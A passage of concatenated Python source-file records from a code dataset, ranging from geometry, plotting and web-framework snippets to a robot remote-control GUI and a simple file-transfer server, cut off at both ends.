total,\"\\n\")\r\n\r\n","sub_path":"cluster/project/calcula.py","file_name":"calcula.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"506130397","text":"class PolygonProjection:\n\tdef __init__(self, vertices, polygon, area_factor, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\t\n\t\t\n\t\tself.__vertices = tuple(vertices)\n\t\tself.__polygon = polygon\n\t\tself.__area_factor = area_factor\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef vertices(self):\n\t\treturn self.__vertices\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef polygon(self):\n\t\treturn self.__polygon\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef area_factor(self):\n\t\treturn self.__area_factor\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef area(self):\n\t\tarea = self.__area_factor * self.projection_area\n\t\t\n\t\treturn area\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef projection_area(self):\n\t\tfirst_length = abs(self.__vertices[1] - self.__vertices[0])\n\t\tsecond_length = 
abs(self.__vertices[2] - self.__vertices[1])\n\t\tthird_length = abs(self.__vertices[0] - self.__vertices[2])\n\t\t\n\t\thalf_perimeter = (first_length + second_length + third_length) / 2\n\t\t\n\t\tprojection_area_square = \\\n\t\t\thalf_perimeter \\\n\t\t\t\t* (half_perimeter - first_length) \\\n\t\t\t\t* (half_perimeter - second_length) \\\n\t\t\t\t* (half_perimeter - third_length)\n\t\t\t\t\n\t\t#!!!!! Think about how to do this better. Probably, because of computation errors,\n\t\t#!!!!! the squared area can turn out to be negative (when one\n\t\t#!!!!! of the sides is small)\n\t\tif projection_area_square <= 0:\n\t\t\tprojection_area = 0\n\t\telse:\n\t\t\tprojection_area = projection_area_square ** 0.5\n\t\t\t\n\t\treturn projection_area\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\nclass Polygon:\n\tdef __init__(self, vertices, penalty, impassability, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\t\n\t\t\n\t\tself.__vertices = tuple(vertices)\n\t\tself.__penalty = penalty\n\t\tself.__impassability = impassability\n\t\t\n\t\t\n\t\t\n\t\tfirst_vector = \\\n\t\t\t[first_coordinate - second_coordinate \\\n\t\t\t\tfor first_coordinate, second_coordinate \\\n\t\t\t\tin zip(self.__vertices[1], self.__vertices[0])]\n\t\t\t\t\n\t\tsecond_vector = \\\n\t\t\t[first_coordinate - second_coordinate \\\n\t\t\t\tfor first_coordinate, second_coordinate \\\n\t\t\t\tin zip(self.__vertices[2], self.__vertices[1])]\n\t\t\t\t\n\t\tthird_vector = \\\n\t\t\t[first_coordinate - second_coordinate \\\n\t\t\t\tfor first_coordinate, second_coordinate \\\n\t\t\t\tin zip(self.__vertices[0], self.__vertices[2])]\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\tself.__normal = [\n\t\t\tfirst_vector[1] * second_vector[2] \\\n\t\t\t\t- first_vector[2] * second_vector[1],\n\t\t\tfirst_vector[2] * second_vector[0] \\\n\t\t\t\t- first_vector[0] * second_vector[2],\n\t\t\tfirst_vector[0] * second_vector[1] \\\n\t\t\t\t- first_vector[1] * second_vector[0]\n\t\t]\n\t\t\n\t\tif self.__normal[2] < 0:\n\t\t\tself.__normal = [- coordinate for coordinate in self.__normal]\n\t\telif self.__normal[2] == 0:\n\t\t\traise Exception() #!!!!!\n\t\t\t\n\t\tnormal_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in self.__normal]) ** 0.5\n\t\t\t\n\t\tself.__normal = \\\n\t\t\t[coordinate / normal_length for coordinate \\\n\t\t\t\tin self.__normal]\n\t\t\t\t\n\t\tself.__normal = tuple(self.__normal)\n\t\t\n\t\t\n\t\t\n\t\tfirst_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in first_vector]) ** 0.5\n\t\t\t\n\t\tsecond_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in second_vector]) ** 0.5\n\t\t\t\n\t\tthird_length = \\\n\t\t\tsum([coordinate ** 2.0 for coordinate in third_vector]) ** 0.5\n\t\t\t\n\t\thalf_perimeter = (first_length + second_length + third_length) / 2\n\t\t\n\t\tself.__area = \\\n\t\t\t(half_perimeter \\\n\t\t\t\t* (half_perimeter - first_length) \\\n\t\t\t\t* (half_perimeter - second_length) \\\n\t\t\t\t* (half_perimeter - third_length)) ** 0.5\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t@property\n\tdef vertices(self):\n\t\treturn self.__vertices\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef penalty(self):\n\t\treturn self.__penalty\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef impassability(self):\n\t\treturn self.__impassability\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef normal(self):\n\t\treturn self.__normal\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef area(self):\n\t\treturn self.__area\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\tdef get_projection(self):\n\t\tvertices = \\\n\t\t\t[vertex[0] + vertex[1] * 1.0j for vertex 
\\\n\t\t\t\tin self.__vertices]\n\t\t\t\t\n\t\t\t\t\n\t\tfirst_length = abs(vertices[1] - vertices[0])\n\t\tsecond_length = abs(vertices[2] - vertices[1])\n\t\tthird_length = abs(vertices[0] - vertices[2])\n\t\t\n\t\thalf_perimeter = (first_length + second_length + third_length) / 2\n\t\t\n\t\tarea = \\\n\t\t\t(half_perimeter \\\n\t\t\t\t* (half_perimeter - first_length) \\\n\t\t\t\t* (half_perimeter - second_length) \\\n\t\t\t\t* (half_perimeter - third_length)) ** 0.5\n\t\t\t\t\n\t\t\t\t\n\t\tpolygon_projection = \\\n\t\t\tPolygonProjection(\n\t\t\t\tvertices,\n\t\t\t\tself,\n\t\t\t\tself.area / area\n\t\t\t)\n\t\t\t\n\t\treturn polygon_projection\n\t\t","sub_path":"planning/surface/polygon.py","file_name":"polygon.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"35746394","text":"import numpy as np\nimport sys\ninputfile = 'input.txt'\noutfile = sys.stdout\n\ndef scale(mat, baseval = 1.) :\n nrows, ncols = mat.shape\n for i in range(0,nrows) :\n maxindex = np.argmax(mat[i,:])\n mat[i] = mat[i]/mat[i,maxindex]\n return mat","sub_path":"scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"220127924","text":"#purpose: to find the number of trailing zeroes for a number x factorial\r\n#Author: Joshua Steier\r\n#10/9/2016\r\ndef zeroes(x):\r\n five = 0\r\n for number in range(2, x + 1):\r\n while number > 0:\r\n if number % 5 ==0:\r\n five= five + 1\r\n number = number / 5\r\n else:\r\n break\r\n return five","sub_path":"trailingzeroes.py","file_name":"trailingzeroes.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34825389","text":"import json\nimport os\n\nfrom yahoo_finance import Share\n\nsymbol = open('symbol.txt', 'r')\nfor line in symbol:\n name = line[:-1]\n yahoo = Share(name)\n with open(os.path.join('data', name + '.json'), 'w+') as outfile:\n json.dump(yahoo.get_historical('2010-01-01', '2014-12-31'), outfile)\n outfile.close()\nsymbol.close()\n","sub_path":"yahoo.py","file_name":"yahoo.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"120021772","text":"import pandas as pd\nfrom fileLoading import loadExcel, readCsv\nimport os\nfrom dateConv import visitToDatetime, createDatetime\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime as dt\nfrom pandas.plotting import register_matplotlib_converters\nimport matplotlib.dates as mdates # For formatting date\n\nregister_matplotlib_converters()\n\n# import the data\nroot = r'C:\\Users\\ARL\\Desktop\\Jashan\\Summit\\analyses\\Data'\ndatapath = os.path.join(root, 'TAWO_visit_log.xlsx')\nvisits = loadExcel(datapath)\nconcpath = os.path.join(root, 'ethane.txt')\nethane = readCsv(concpath)\n\n# data cleaning\ndates = visits['Date'].values\ndates = dates[1:]\nbadcols = ['Initials', 'Unnamed: 5', 'Date']\nvisits.drop(badcols, axis=1, inplace=True)\nvisits.drop([0], axis=0, inplace=True)\nvisits.dropna(axis=0, how='all', inplace=True)\nvisits.reset_index(drop=True, inplace=True)\n\nethane.columns = ['yr', 'mo', 'dy', 'hr', 'na', 'val']\n\n\n# create proper datetimes\nvisits['start'], visits['end'] = visitToDatetime(dates,\n visits['Arrival time (Z)'].values,\n visits['Departure time 
(Z)'].values)\nethane['datetime'] = createDatetime(ethane['yr'].values, ethane['mo'].values,\n ethane['dy'].values, ethane['hr'].values)\n\n# ethane cleaning\nethane.drop(['yr', 'mo', 'dy', 'hr', 'na'], axis=1, inplace=True)\nethane.dropna(how='any', inplace=True)\nethane.reset_index(drop=True, inplace=True)\n\n# remove leftover columns\nbadcols = ['Arrival time (Z)', 'Departure time (Z)']\nvisits.drop(badcols, axis=1, inplace=True)\n\n# calculate middle date time\nvisits['datetime'] = visits['start'] + (visits['end'] - visits['start'])/2\n\n\ncombo = pd.merge_asof(visits.sort_values('datetime'),\n ethane.sort_values('datetime'),\n on='datetime', direction='nearest',\n tolerance=pd.Timedelta('3 hour'))\ncombo.dropna(axis=0, how='any', inplace=True)\nethane = ethane[ethane['datetime'] > dt.datetime(2019, 1, 1, 1)]\n\nsns.set(style=\"whitegrid\")\nf, ax = plt.subplots(figsize=(9, 9))\nsns.despine(f, left=True, bottom=True)\nsns.scatterplot(x='datetime', y='val', data=combo, hue='# persons', ax=ax, s=70, zorder=5,\n palette='seismic',\n hue_norm=(0, 6))\nsns.scatterplot(x='datetime', y='val', data=ethane, ax=ax, s=25, alpha=0.5, color='red', label='Background Values')\nplt.title('TAWO Vistor Log Correlation')\nplt.xlabel('')\nplt.ylabel('Ethane Mixing Ratio (ppb)')\n\n# New xticks plot\nmonths = mdates.MonthLocator() # Add tick every month\ndays = mdates.DayLocator(range(1, 32, 5)) # Add tick every 5th day in a month\nmonthFmt = mdates.DateFormatter('%b') # Use abbreviated month name\n\n# Add the locators to the axis\nax.xaxis.set_major_locator(months)\nax.xaxis.set_major_formatter(monthFmt)\nax.xaxis.set_minor_locator(days)\n\nplt.xlim(dt.datetime(2019, 4, 30), dt.datetime(2019, 7, 1))\nplt.legend()\n\nplt.show()\n\nprint('debug point')\n","sub_path":"analyses/tawoPollution/pollutionCheckEthane.py","file_name":"pollutionCheckEthane.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"39950244","text":"\"\"\"\nRunning a rocketsled optimization where the objective function has a categorical\nargument.\n\n--------------------------------------------------------------------------\nThe following workflow is only one Firework (one job), for example purposes.\nHowever, FireWorks and rocketsled are capable of handling more complex\nworkflows including multiple jobs and advanced dependencies. 
Please see the\nFireworks and rocketsled documentation pages for more information:\n\nhttps://hackingmaterials.github.io/rocketsled/\nhttps://materialsproject.github.io/fireworks/\n\"\"\"\n\nfrom fireworks.core.rocket_launcher import rapidfire\nfrom fireworks import Workflow, Firework, LaunchPad\n\nfrom rocketsled import OptTask\nfrom rocketsled.examples.tasks import MixedCalculateTask\n\nopt_label = \"opt_categorical\"\nlpad = LaunchPad(name='rsled')\ndims = [(1, 2), (1, 2), (1, 2), (\"red\", \"green\", \"blue\")]\n\n\ndef wf_creator(x):\n    fw1_spec = {'A': x[0], 'B': x[1], 'C': x[2], 'D': x[3], '_x': x}\n\n    # CalculateTask writes _y field to the spec internally.\n\n    firework1 = Firework([MixedCalculateTask(),\n                          OptTask(wf_creator='rocketsled.examples.categorical.'\n                                             'wf_creator',\n                                  dimensions=dims,\n                                  lpad=lpad,\n                                  get_z='rocketsled.examples.categorical.'\n                                        'get_z',\n                                  duplicate_check=True,\n                                  opt_label=opt_label)],\n                         spec=fw1_spec)\n    return Workflow([firework1])\n\n\ndef get_z(x):\n    if x[1] == 1:\n        cat = \"tiger\"\n    else:\n        cat = \"lion\"\n    return [x[0] ** 2, cat]\n\n\nif __name__ == \"__main__\":\n    lpad.reset(password=None, require_password=False)\n    lpad.add_wf(wf_creator([1, 1, 2, \"red\"]))\n    rapidfire(lpad, nlaunches=23, sleep_time=0)\n","sub_path":"rocketsled/examples/categorical.py","file_name":"categorical.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"243311410","text":"from django.shortcuts import render\nfrom django.views.generic.base import View\n\n# Create your views here.\n\nfrom .models import Movie\n\nclass MoviesView(View):\n    \"\"\"List of movies\"\"\"\n\n    def get(self,request):\n        movies = Movie.objects.all()\n        return render(request, 'movies/movies.html', {'movie_list': movies})\n\n\nclass MovieDetailView(View):\n\n    def get(self,request,slug):\n        movie = Movie.objects.get(url=slug)\n        return render(request,'movies/moviesingle.html',{'movie': movie})","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"301072937","text":"# With Statement\n# Good for running something and then ending it; resource management\n# Usually used to replace try & finally\n\n# With Statement:\nwith open('hello.txt','w') as f:\n\tf.write('hello, world!')\n\n# Without With Statement:\nf = open('hello.txt','w')\ntry:\n\tf.write('Hello, World')\nfinally:\n\tf.close()\n\n\n# Supporting with in your own objects\n# Add __enter__ and __exit__ methods to an object if you want to use it to function as a context manager\n# Context Manager - A way to manage & allocate resources","sub_path":"python/python_tricks/with_statement.py","file_name":"with_statement.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"556921194","text":"from flask.ext.restful import fields\r\nfrom app.utils.gis_json_fields import PointToLatLng, PolygonToLatLng\r\nfrom app.authentication.fields import user_fields\r\nfrom copy import copy\r\n\r\nsuccess_fields = dict(\r\n    status=fields.String,\r\n    message=fields.String,\r\n)\r\n\r\nupdate_fields = dict(\r\n    status=fields.String,\r\n    message=fields.String,\r\n    date_modified=fields.DateTime(\"iso8601\")\r\n)\r\n\r\ncontractor_fields = dict(\r\n    id=fields.Integer,\r\n    name=fields.String\r\n)\r\n\r\nproject_fields = dict(\r\n    id=fields.Integer,\r\n    
project_name=fields.String,\r\n project_address=fields.String,\r\n project_status=fields.String,\r\n project_manager=fields.Nested(user_fields, allow_null=False),\r\n contractor=fields.Nested(contractor_fields, allow_null=False),\r\n property_owner=fields.String,\r\n authority_having_jurisdiction_or_bldg_dept=fields.String,\r\n civicsolar_account_manager=fields.Nested(user_fields, allow_null=False),\r\n utility=fields.String,\r\n coordinates=PointToLatLng(attribute='coordinates'),\r\n area=PolygonToLatLng(attribute='area'),\r\n date_created=fields.DateTime(\"iso8601\"),\r\n date_modified=fields.DateTime(\"iso8601\")\r\n)\r\n\r\nproject_create_fields = dict(\r\n status=fields.String,\r\n message=fields.String,\r\n project=fields.Nested(project_fields, allow_null=False)\r\n)\r\n\r\n# project_file_fields = dict(\r\n# id=fields.Integer,\r\n# section_id=fields.Integer,\r\n# modelname=fields.String,\r\n# filename=fields.String,\r\n# filetype=fields.String,\r\n# coordinates=PointToLatLng(attribute='coordinates'),\r\n# heading=fields.Integer,\r\n# date_created=fields.DateTime(\"iso8601\"),\r\n# date_modified=fields.DateTime(\"iso8601\")\r\n# )\r\n\r\nproject_complete_fields = copy(project_fields)\r\nproject_complete_fields[\"sections\"] = fields.Raw\r\nproject_complete_fields[\"section_files\"] = fields.Raw\r\n","sub_path":"app/home/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"494623699","text":"__author__ = 'scottumsted'\n\nfrom unittest import TestCase\nfrom carrierservices.UpsServices import UpsServices\n\n\nclass TestUpsServices(TestCase):\n ups_good1 = '1Z98A25FP202057811'\n ups_good2 = '1Z5755816893302595'\n ups_good3 = '1Z36926X0318583063'\n ups_good4 = '1zr038r30365320384'\n ups_good5 = '1za7r9269029685221'\n ups_goods = [\n ups_good1,\n ups_good2,\n ups_good3,\n ups_good4,\n ups_good5\n ]\n ups_bad1 = '9212391234567812345570'\n ups_bad2 = '5570'\n ups_bad3 = '9612391234567812345570'\n ups_bad4 = '9312391234567812345570'\n ups_bad5 = '9912391234567812345570'\n ups_bad6 = '1Z36926X0318583064'\n ups_bad7 = '1zr038r30365320584'\n ups_bads = [\n ups_bad1,\n ups_bad2,\n ups_bad3,\n ups_bad4,\n ups_bad5,\n ups_bad6,\n ups_bad7,\n None\n ]\n\n def test_positive_ups_is_carrier(self):\n check = True\n for good in self.ups_goods:\n check = UpsServices.is_carrier(good) and check\n self.assertTrue(check, 'positive ups check failed for %s' % str(good))\n\n def test_negative_ups_is_carrier(self):\n check = False\n for bad in self.ups_bads:\n check = UpsServices.is_carrier(bad) or check\n self.assertFalse(check, 'negative ups check failed for %s' % str(bad))\n\n def test_positive_ups_track(self):\n for good in self.ups_goods:\n fs = UpsServices(good)\n results = fs.track()\n self.assertIsNotNone(results, 'positive ups track failed, None results, for %s' % str(good))\n self.assertTrue('success' in results and results['success'],\n 'positive ups track failed, success not true, for %s' % str(good))\n","sub_path":"tests/test_upsServices.py","file_name":"test_upsServices.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"426688644","text":"import matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport operator\n\nfig = plt.figure(figsize=(5,5))\nax = 
plt.axes()\na=.5\nb=1\n\nx=np.zeros(101)\ny=np.zeros(101)\nx2=np.zeros(101)\ny2=np.zeros(101)\n\n\nfor i in range(0,101):\n x[i]=i/50.0-1\n y[i]=math.sqrt(1-x[i]**2)*1\n\n\nr1=28\nr2=19\nr3=5\n\nplt.plot(x*r1,-y*r1,'y',lw=4)\nplt.plot(-x*r1,y*r1,'y',lw=4)\nplt.plot(x*r2,-y*r2,'b')\nplt.plot(-x*r2,y*r2,'b')\nplt.plot(x*r3,-y*r3,'r')\nplt.plot(-x*r3,y*r3,'r')\nax.arrow(r1/math.sqrt(2), r1/math.sqrt(2), -4,-4, head_width=3, head_length=3, fc='g', ec='g',lw=3)\nax.fill_between(x*r1,y*r1,-y*r1,hatch=\"X\",color=\"none\",edgecolor=\"c\")\nax.fill_between(x*r2*1.1,y*r2*1.1,-y*r2*1.1,hatch=\"X\",color=\"b\",edgecolor=\"c\")\nax.fill_between(x*r2,y*r2,-y*r2,color=\"m\",edgecolor=\"none\")\nax.fill_between(x*r3,y*r3,-y*r3,color=\"r\",edgecolor=\"none\")\n\nax.annotate(r'$\\rm{increasingly}$', xy=(0, 12), xytext=(22, 24), color='g')\nax.annotate(r'$\\rm{heavy}$', xy=(0, 12), xytext=(22, 21), color='g')\nax.annotate(r'$\\rm{nuclei}$', xy=(0, 12), xytext=(22, 18), color='g')\n\n#plt.plot(x*r2,-y*r2,'b',lw=3)\n#plt.plot(-x*r2,y*r2,'b',lw=3)\n#ax.fill_between(x*r1,y*r1,-y*r1,hatch=\"X\",color=\"b\",edgecolor=\"c\")\nax.annotate(r'$\\rm{free}$ $\\rm{neutrons}$', xy=(0, 12), xytext=(-37, 0), color='b')\nax.annotate(r'$\\rm{neutron}$ $\\rm{drip}$', xy=(0, 12), xytext=(-37, 3), color='b')\n\n\nplt.gca().axison = False\nax.annotate(r'$\\rm{atmosphere}$', xy=(0, 12), xytext=(-10, 30), color='y')\nax.annotate(r'$\\rm{lattice}$ $\\rm{nuclei}$ $\\rm{crust}$', xy=(0, 12), xytext=(-10, 22), color='k')\nax.annotate(r'$\\rm{neutron}$ $\\rm{superfluid}$', xy=(0, 12), xytext=(-12, 13), color='k')\nax.annotate(r'$95\\%$ $\\rm{neutrons}$', xy=(0, 12), xytext=(-12, 10), color='k')\nax.annotate(r'$\\rm{(proton}$ $\\rm{superconductor)}$', xy=(0, 11), xytext=(-12, 7), color='k')\nax.annotate(r'$\\rm{inner}$', xy=(0, 12), xytext=(-3, 1), color='k')\nax.annotate(r'$\\rm{core}$', xy=(0, 12), xytext=(-3, -1), color='k')\nplt.xlim([-30,30])\nplt.ylim([-30,30])\nplt.savefig('pulsar.eps')\nplt.show()\n","sub_path":"code/pulsar.py","file_name":"pulsar.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"366072963","text":"\"\"\"\nDaniel Johnson\nManually controlled to move around. 
When a beacon is detected at any time, the robot ignores manual controls and drives\nto and picks up the beacon, showing a progress bar on how close it is to the beacon.\n\"\"\"\n\nimport tkinter\nfrom tkinter import ttk, HORIZONTAL\nimport mqtt_remote_method_calls as com\n\n\nclass PCDelegate(object):\n    def __init__(self, progressbar, bar_var):\n        self.detect_beacon = False\n        self.original_distance = -1\n        self.percent_travel = 0\n        self.progressbar = progressbar\n        self.bar_var = bar_var\n        self.pre_percent = 0\n\n    def distance_from_beacon(self, current_distance):\n        if not self.detect_beacon:\n            self.detect_beacon = True\n            self.original_distance = current_distance\n        else:\n            self.pre_percent = self.percent_travel\n            self.distance = current_distance\n            self.percent_travel = (1-self.distance/self.original_distance) * 100\n            #some way to have the progressbar value equal self.percent_travel\n            self.bar_var = self.percent_travel\n            self.progressbar.step(self.percent_travel - self.pre_percent)\n\n\ndef main():\n    print('Project Testing')\n    root = tkinter.Tk()\n    root.title(\"MQTT Remote\")\n    main_frame = ttk.Frame(root, padding=5)\n    main_frame.grid()\n    description = \"Seagull O' Meter\"\n    label = ttk.Label(main_frame, text=description)\n    label.grid(columnspan=2)\n    bar_var = 0\n    progressbar = ttk.Progressbar(root,orient = HORIZONTAL, variable = bar_var, length = 100)\n    progressbar.grid(columnspan=10)\n    main_frame = ttk.Frame(root, padding=20, relief='raised')\n    main_frame.grid()\n    my_delegate = PCDelegate(progressbar, bar_var)\n    mqtt_client = com.MqttClient(my_delegate)\n    mqtt_client.connect_to_ev3()\n    speed_label = ttk.Label(main_frame, text=\"Speed\")\n    speed_label.grid(row=0, column=1)\n    speed_entry = ttk.Entry(main_frame, width=8, justify=tkinter.RIGHT)\n    speed_entry.insert(0, \"600\")\n    speed_entry.grid(row=1, column=1)\n\n    forward_button = ttk.Button(main_frame, text=\"Forward\")\n    forward_button.grid(row=2, column=1)\n    # forward_button and '<Up>' key is done for you here...\n    forward_button['command'] = lambda: go_forward(mqtt_client, speed_entry)\n    root.bind('<Up>', lambda event: go_forward(mqtt_client, speed_entry))\n\n    left_button = ttk.Button(main_frame, text=\"Left\")\n    left_button.grid(row=3, column=0)\n    # left_button and '<Left>' key\n    left_button['command'] = lambda: go_left(mqtt_client, speed_entry)\n    root.bind('<Left>', lambda event: go_left(mqtt_client, speed_entry))\n\n    stop_button = ttk.Button(main_frame, text=\"Stop\")\n    stop_button.grid(row=3, column=1)\n    # stop_button and '<space>' key (note, does not need left_speed_entry, right_speed_entry)\n    stop_button['command'] = lambda: stop(mqtt_client)\n    root.bind('<space>', lambda event: stop(mqtt_client))\n\n    right_button = ttk.Button(main_frame, text=\"Right\")\n    right_button.grid(row=3, column=2)\n    # right_button and '<Right>' key\n    right_button['command'] = lambda: go_right(mqtt_client, speed_entry)\n    root.bind('<Right>', lambda event: go_right(mqtt_client, speed_entry))\n\n    back_button = ttk.Button(main_frame, text=\"Back\")\n    back_button.grid(row=4, column=1)\n    # back_button and '<Down>' key\n    back_button['command'] = lambda: go_backward(mqtt_client, speed_entry)\n    root.bind('<Down>', lambda event: go_backward(mqtt_client, speed_entry))\n\n    up_button = ttk.Button(main_frame, text=\"Up\")\n    up_button.grid(row=5, column=0)\n    up_button['command'] = lambda: send_up(mqtt_client)\n    root.bind('<u>', lambda event: send_up(mqtt_client))\n\n    down_button = ttk.Button(main_frame, text=\"Down\")\n    down_button.grid(row=6, column=0)\n    down_button['command'] = lambda: send_down(mqtt_client)\n    root.bind('<j>', lambda 
event: send_down(mqtt_client))\n\n # Buttons for quit and exit\n q_button = ttk.Button(main_frame, text=\"Quit\")\n q_button.grid(row=5, column=2)\n q_button['command'] = (lambda: quit_program(mqtt_client, False))\n\n e_button = ttk.Button(main_frame, text=\"Exit\")\n e_button.grid(row=6, column=2)\n e_button['command'] = (lambda: quit_program(mqtt_client, True))\n root.mainloop()\n\n\n# callbacks\ndef send_up(mqtt_client):\n print(\"arm_up\")\n mqtt_client.send_message(\"arm_up\")\n\n\ndef send_down(mqtt_client):\n print(\"arm_down\")\n mqtt_client.send_message(\"arm_down\")\n\n\ndef go_forward(mqtt_client, speed_entry):\n print(\"forward\")\n mqtt_client.send_message(\"forward\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = \"forward\"\n\n\ndef go_right(mqtt_client, speed_entry):\n print(\"right\")\n mqtt_client.send_message(\"right\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = \"right\"\n\n\ndef stop(mqtt_client):\n print(\"stop\")\n mqtt_client.send_message(\"stop\")\n turtleState = \"stop\"\n\n\ndef go_left(mqtt_client, speed_entry):\n print(\"left\")\n mqtt_client.send_message(\"left\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = \"left\"\n\n\ndef go_backward(mqtt_client, speed_entry):\n print(\"back\")\n mqtt_client.send_message(\"back\", [int(speed_entry.get()), int(speed_entry.get())])\n turtleState = 'backward'\n\n\n# Quit and Exit button callbacks\ndef quit_program(mqtt_client, shutdown_ev3):\n if shutdown_ev3:\n print(\"shutdown\")\n mqtt_client.send_message(\"shutdown\")\n mqtt_client.close()\n exit()\n\n\nmain()","sub_path":"projects/johnsod4/DanielProject.py","file_name":"DanielProject.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"43843027","text":"#!/usr/bin/env python3\n\n# server.py\n# The server\n\nfrom common import *\nimport os\nimport posixpath\nimport signal\nimport socket\nimport subprocess\nimport sys\nimport time\n\n# Default IPs and ports to bind to\nserver_ip = \"\"\nserver_port = 2112\n\n# Sockets\nsock_welcome = None\nsock_cli = None\nsock_data = None\n\nis_worker = False\nconn_workers = set()\n\ndef usage():\n abort(usage.message)\nusage.message = \"\"\"Usage:\n server.py \n server.py \n\"\"\"\n\n# Send data (bytes) across sock_data to data_ip:data_port\ndef send_data(data_ip, data_port, data):\n global sock_data\n # Connect to the client's data socket\n sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n debug(\"[send_data] Attempting to connect to %s:%d\" %(data_ip, data_port))\n sock_data.connect((data_ip, data_port))\n debug(\"[send_data] Success!\")\n # Send 510 with data length\n send_msg(sock_cli, MSG_510 % (len(data)))\n # Send data\n sock_data.sendall(data)\n sock_data.close()\n\n# Check the path to see if it is under PWD\ndef check_path(path):\n pwd = posixpath.abspath(os.getcwd()) + \"/\"\n apath = posixpath.abspath(path) + \"/\"\n return apath.find(pwd) == 0\n\n# Check the file to see if it is under PWD\ndef check_file(filename):\n pwd = posixpath.abspath(os.getcwd()) + \"/\"\n apath = posixpath.abspath(filename)\n if (apath.find(pwd) == 0):\n # The file is under PWD. 
\n# Check the file to see if it is under PWD\ndef check_file(filename):\n    pwd = posixpath.abspath(os.getcwd()) + \"/\"\n    apath = posixpath.abspath(filename)\n    if (apath.find(pwd) == 0):\n        # The file is under PWD. Check to make sure it is a file.\n        return posixpath.isfile(apath)\n    else:\n        # The file is not under PWD.\n        return False\n\n# PUT command\n# params is the tuple of parameters passed in the 200 MSG\n# data_ip is the IP address of the client's data connection\ndef put(params, data_ip):\n    global sock_data\n    if len(params) < 5:\n        send_msg(sock_cli, MSG_800)\n        return False\n    data_port = int(params[2])\n    length = int(params[3])\n    path = params[4]\n    # Connect to the client's data socket\n    sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    debug(\"[put] Attempting to connect to %s:%d\" %(data_ip, data_port))\n    sock_data.connect((data_ip, data_port))\n    debug(\"[put] Success!\")\n    if not check_path(path):\n        # Don't write it! It's not under PWD\n        send_msg(sock_cli, MSG_290 %(path))\n        sock_data.close()\n        return False\n    # Open the file\n    try:\n        fd = open(path, \"wb\")\n        # Send 510 with data length\n        send_msg(sock_cli, MSG_510 % (-1))\n        bytesrecv = 0\n        while bytesrecv < length:\n            length_block = min(length - bytesrecv, 4096)\n            debug(\"[put] Receiving block...\")\n            block = recv_block(sock_data, length_block)\n            if block is None:\n                # Client hung up\n                send_msg(sock_cli, MSG_590)\n                sock_data.close()\n                return False\n            fd.write(block)\n            bytesrecv += length_block\n        fd.close()\n    except(OSError):\n        # Permission problems\n        send_msg(sock_cli, MSG_290 %(path))\n        sock_data.close()\n        return False\n    # Send a 520 Success\n    send_msg(sock_cli, MSG_520)\n    sock_data.close()\n    return True\n\n# LS command\n# params is the tuple of parameters passed in the 300 MSG\n# data_ip is the IP address of the client's data connection\ndef ls(params, data_ip):\n    if len(params) < 4:\n        send_msg(sock_cli, MSG_800)\n        return False\n    data_port = int(params[2])\n    path = params[3]\n    # Check the path\n    if check_path(path):\n        # Run ls -la\n        ls_data = subprocess.Popen(\n            [\"ls\", \"-al\", \"--\", path],\n            